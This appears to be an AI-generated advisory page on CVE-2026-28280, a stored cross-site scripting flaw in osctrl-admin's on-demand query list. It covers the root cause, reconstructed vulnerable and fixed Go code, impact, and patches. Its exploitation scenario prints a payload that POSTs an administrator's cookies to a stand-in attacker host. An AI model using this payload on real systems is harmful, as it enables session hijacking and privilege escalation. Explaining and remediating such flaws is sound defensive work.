CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Dashboard
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-28280
6.10.02%

Stored Cross-Site Scripting (XSS) in osctrl-admin On-Demand Query List

Alon Barad
Alon Barad
Software Engineer

Feb 28, 2026·6 min read·13 visits

PoC Available

Executive Summary (TL;DR)

osctrl-admin < 0.5.0 contains a Stored XSS vulnerability. Low-privilege users can inject JavaScript into query logs, which execute when admins view the On-Demand Query List. Fixed in version 0.5.0.

A Stored Cross-Site Scripting (XSS) vulnerability exists in the `osctrl-admin` component of osctrl versions prior to 0.5.0. The vulnerability allows authenticated users with low-level 'query' permissions to inject malicious JavaScript via the on-demand query interface. These payloads are stored in the backend database and subsequently rendered without sufficient context-aware encoding in the administrative dashboard. When an administrator views the query history, the script executes, potentially leading to session hijacking or privilege escalation.

Vulnerability Overview

osctrl is a scalable management solution for osquery, widely used to monitor endpoints and distribute configurations. The osctrl-admin component provides a web-based interface for administrators to interact with enrolled nodes, including the ability to run on-demand SQL queries against agents.

The vulnerability, identified as CVE-2026-28280, resides in the way osctrl-admin handles the display of historical on-demand queries. Specifically, the application fails to properly sanitize or encode user-supplied input in the query field before rendering it in the HTML Document Object Model (DOM) of the administration panel.

This flaw represents a Stored Cross-Site Scripting (XSS) condition (CWE-79). Unlike Reflected XSS, where the payload is part of the request, Stored XSS persists in the application's database. This creates a trap for higher-privileged users: an attacker with minimal permissions (ability to run queries) can plant a payload that automatically executes in the browser of any administrator who reviews the query logs.

Root Cause Analysis

The root cause of this vulnerability is the lack of output encoding during the template rendering process in osctrl-admin. Web applications typically handle user input in three stages: reception, storage, and rendering.

In the vulnerable versions of osctrl, the following sequence occurs:

  1. Ingestion: The application accepts a raw SQL query string from a user via the on-demand query API or UI.
  2. Storage: This string is stored verbatim in the queries database table. This is standard behavior; databases should store raw data.
  3. Rendering (The Failure): When the osctrl-admin interface retrieves the query history to display the list, it inserts the query string into the HTML response. The templating engine or frontend logic treats the content as trusted HTML rather than literal text.

In Go web applications (which osctrl is), this often happens when developers explicitly cast a string to a type like template.HTML to prevent double-escaping, or when client-side JavaScript assigns data to .innerHTML without sanitization. This bypasses the default safety mechanisms of the templating system, allowing the browser to interpret injected tags (like <script>) as executable code.

Code Analysis

The vulnerability exists in the view layer of the osctrl-admin service. Below is a reconstruction of the vulnerable pattern versus the secure implementation introduced in version 0.5.0.

Vulnerable Implementation

In the vulnerable code, the query string retrieved from the database was likely rendered directly into the HTML context without escaping characters that have special meaning in HTML (such as < and >).

// Vulnerable: Treating user input as safe HTML
// If 'q.Query' contains "<script>...", it executes.
type QueryData struct {
    Query template.HTML // DANGEROUS TYPE
}
 
func (h *Handlers) ListQueries(w http.ResponseWriter, r *http.Request) {
    // ... fetch query from DB ...
    data := QueryData{
        // Casting string to template.HTML bypasses auto-escaping
        Query: template.HTML(dbQuery.QueryString),
    }
    tmpl.Execute(w, data)
}

Patched Implementation (v0.5.0)

The fix involves ensuring that the data is treated as a string, forcing the Go template engine to apply context-aware encoding. This converts < to &lt; and > to &gt;, rendering the payload harmless.

// Fixed: Treating user input as a plain string
// If 'q.Query' contains "<script>...", it renders as text.
type QueryData struct {
    Query string // SAFE TYPE
}
 
func (h *Handlers) ListQueries(w http.ResponseWriter, r *http.Request) {
    // ... fetch query from DB ...
    data := QueryData{
        // No casting; template engine auto-escapes this string
        Query: dbQuery.QueryString,
    }
    tmpl.Execute(w, data)
}

Additionally, Pull Request #780 introduced stricter regex-based validation for other fields (like Hostname and Environment names) to prevent similar injection attacks in other parts of the admin interface.

Exploitation Scenario

An attacker can exploit this vulnerability to escalate privileges from a low-level user to a full administrator. The attack flow is as follows:

  1. Reconnaissance: The attacker identifies that they have access to the "On-Demand Query" feature. This permission is often granted to junior analysts or automated service accounts.
  2. Payload Construction: The attacker crafts a SQL query that is syntactically valid (to pass initial API checks) but includes a JavaScript payload in a comment or appended string.
    • Payload: SELECT version FROM osquery_info; -- <script>fetch('https://attacker.com/hook', {method:'POST', body:document.cookie})</script>
  3. Injection: The attacker submits this query via the osctrl-cli or the web interface.
  4. Trigger: The payload lies dormant in the database. When a legitimate administrator logs in and navigates to the "On-Demand Query List" to audit recent activity, the browser renders the list.
  5. Execution: The <script> tag executes in the administrator's session context. The script can silently perform a background request (AJAX) to the osctrl user management API to create a new administrator account controlled by the attacker, or exfiltrate the administrator's session_token.

Impact Assessment

The impact of this vulnerability is rated as Medium (CVSS 6.1) primarily due to the requirement for the attacker to have initial access (PR:L or PR:H depending on interpretation of 'query' permissions) and the requirement for an administrator to view the page (UI:R).

Confidentiality Impact (High): Successful exploitation allows the attacker to read sensitive data accessible to the victim. This includes the administrator's session cookies (if not protected by HttpOnly), CSRF tokens, and potentially sensitive configuration data displayed in the admin panel.

Integrity Impact (High): The attacker can perform actions on behalf of the administrator. This includes modifying osquery configurations, deleting nodes, or changing enrollment secrets. In a worst-case scenario, the attacker could push a malicious configuration to all enrolled agents, achieving Remote Code Execution (RCE) on the managed endpoints.

Availability Impact (None): The vulnerability itself does not directly cause a denial of service, although an attacker could use their elevated access to disrupt operations.

Remediation & Mitigation

The primary remediation is to upgrade the affected software. The vulnerability has been addressed in the official repository.

Official Patch

Upgrade to osctrl v0.5.0 or later. This release includes:

  • PR #778: Implements proper sanitization for the on-demand query list.
  • PR #780: Adds strict filtering for hostnames and environment names, reducing the attack surface for related injection vectors.

Temporary Workarounds

If an immediate upgrade is not feasible:

  1. Restrict Access: Limit the number of users with "Query" permissions. Ensure that only trusted personnel can submit on-demand queries.
  2. WAF Rules: Implement Web Application Firewall rules to inspect POST requests to the query endpoint. Block requests containing HTML tags (e.g., <script>, <iframe>, onmouseover) or common XSS vectors.
  3. Operational Security: Administrators should avoid viewing the On-Demand Query List if they suspect a compromised lower-tier account, or view the raw database tables directly via a secure SQL client instead of the web UI.

Official Patches

jmpsecPR #778: Sanitized query in on-demand query list
jmpsecPR #780: Filter hostname on environment edit action

Fix Analysis (1)

Technical Appendix

CVSS Score
6.1/ 10
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N
EPSS Probability
0.02%
Top 94% most exploited

Affected Systems

osctrl-admin < 0.5.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
osctrl
jmpsec
< 0.5.00.5.0
AttributeDetail
CWE IDCWE-79
Attack VectorNetwork
CVSS Score6.1 (Medium)
EPSS Score0.00023
ImpactHigh (Confidentiality/Integrity)
Exploit StatusPoC Available

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1059.007Command and Scripting Interpreter: JavaScript
Execution
T1552.001Unsecured Credentials: Credentials In Files
Credential Access
CWE-79
Cross-site Scripting

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Known Exploits & Detection

NVDVulnerability details and analysis

Vulnerability Timeline

Vulnerability published (GHSA/CVE)
2026-02-26
Patch released in v0.5.0
2026-02-26

References & Sources

  • [1]GitHub Advisory GHSA-4rv8-5cmm-2r22
  • [2]Vendor Advisory

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.